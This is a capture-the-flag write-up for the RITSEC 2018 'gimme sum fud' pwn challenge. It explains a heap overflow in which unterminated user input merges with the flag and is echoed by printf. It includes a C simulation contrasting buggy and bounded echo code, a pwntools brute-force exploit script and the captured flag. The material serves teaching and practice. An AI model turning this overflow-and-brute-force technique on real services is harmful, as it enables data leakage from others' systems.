Tags: pwn 

Full solution with steps taken is found [here](https://github.com/happysox/CTF_Writeups/tree/master/RITSEC_CTF_2018/gimme_sum_fud).

TLDR:

Heap overflow. User input and the flag are both placed on the heap. User input is reflected to stdout and is neither null terminated nor bounds checked properly. It is therefore possible to merge the two strings in heap memory before `printf` is called on the user input, so the flag is echoed back along with it.
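The merge described above, as an added C illustration that is not from the writeup or the challenge binary: a simulated heap holding the user's chunk, a chunk-header gap and the flag chunk, with the buggy echo beside a bounded, terminated one. The chunk sizes, the gap and the flag text are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Simulated heap, modelled on the layout the writeup describes: input chunk,
 * chunk-header gap, flag chunk.  One flat array keeps every access inside a
 * single object, so the demo is well defined.  All values are constructed. */
#define INPUT_SZ 16
#define GAP_SZ   16
#define FLAG_SZ  32
#define HEAP_SZ  (INPUT_SZ + GAP_SZ + FLAG_SZ)

static const char FLAG[] = "FLAG{constructed_example_flag}";

/* Write user_len bytes of 'A' into a fresh heap and echo it with %s.
 * hardened=0 reproduces the bug: no length check and no terminating NUL, so
 * input that reaches the flag chunk merges with it and printf prints both.
 * hardened=1 bounds the copy to the chunk and terminates it.  Returns length. */
static size_t echo(int hardened, size_t user_len, char *out, size_t outsz) {
    char heap[HEAP_SZ + 1];
    memset(heap, 0, sizeof heap);                       /* +1: sentinel NUL */
    memcpy(heap + INPUT_SZ + GAP_SZ, FLAG, sizeof FLAG);
    if (hardened) {
        if (user_len > INPUT_SZ - 1) user_len = INPUT_SZ - 1;
        memset(heap, 'A', user_len);
        heap[user_len] = '\0';                /* terminator stays in chunk */
    } else {
        if (user_len > HEAP_SZ) user_len = HEAP_SZ;   /* keeps sim in bounds */
        memset(heap, 'A', user_len);          /* bug: no bound, no terminator */
    }
    return (size_t)snprintf(out, outsz, "%s", heap);
}

/* 1 if the echoed output contains the flag, 0 otherwise. */
static int leaks_flag(int hardened, size_t user_len) {
    char out[HEAP_SZ + 1];
    echo(hardened, user_len, out, sizeof out);
    return strstr(out, "FLAG{") != NULL;
}

int main(void) {
    char out[HEAP_SZ + 1];
    /* Same idea as the exploit's brute force: grow the input until it leaks. */
    for (size_t n = INPUT_SZ; n <= INPUT_SZ + GAP_SZ; n += 8) {
        echo(0, n, out, sizeof out);
        printf("unsafe len=%2zu leaks=%d  %s\n", n, leaks_flag(0, n), out);
    }
    echo(1, 64, out, sizeof out);
    printf("safe   len=64 leaks=%d  %s\n", leaks_flag(1, 64), out);
    return 0;
}
```

Inputs shorter than the gap still hit a zero byte before the flag chunk, which is why the exploit has to step the payload length up until the two strings join.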

**For the remote solution** I just brute-forced the offset between our input and the flag in memory.

```python
#!/usr/bin/python2
from pwn import *

received = ""
length = 0x400
with context.quiet:
    # Grow the payload 0x10 bytes at a time until the overflowed input
    # runs into the flag chunk and the flag is echoed back with it.
    while "SEC{" not in received and length < 0x700:
        p = process('./pwn3')
        #p = remote('fun.ritsec.club', 1338)
        payload = "A"*(length-1)
        p.sendlineafter('hangry...\n', payload)
        received = p.recvall()
        p.close()
        length += 0x10
print received.split('\n')[1]
```

```
$ ./exploit.py
RITSEC{Muff1n_G0verFl0w_mmmm}
```

Original writeup (https://github.com/happysox/CTF_Writeups/tree/master/RITSEC_CTF_2018/gimme_sum_fud).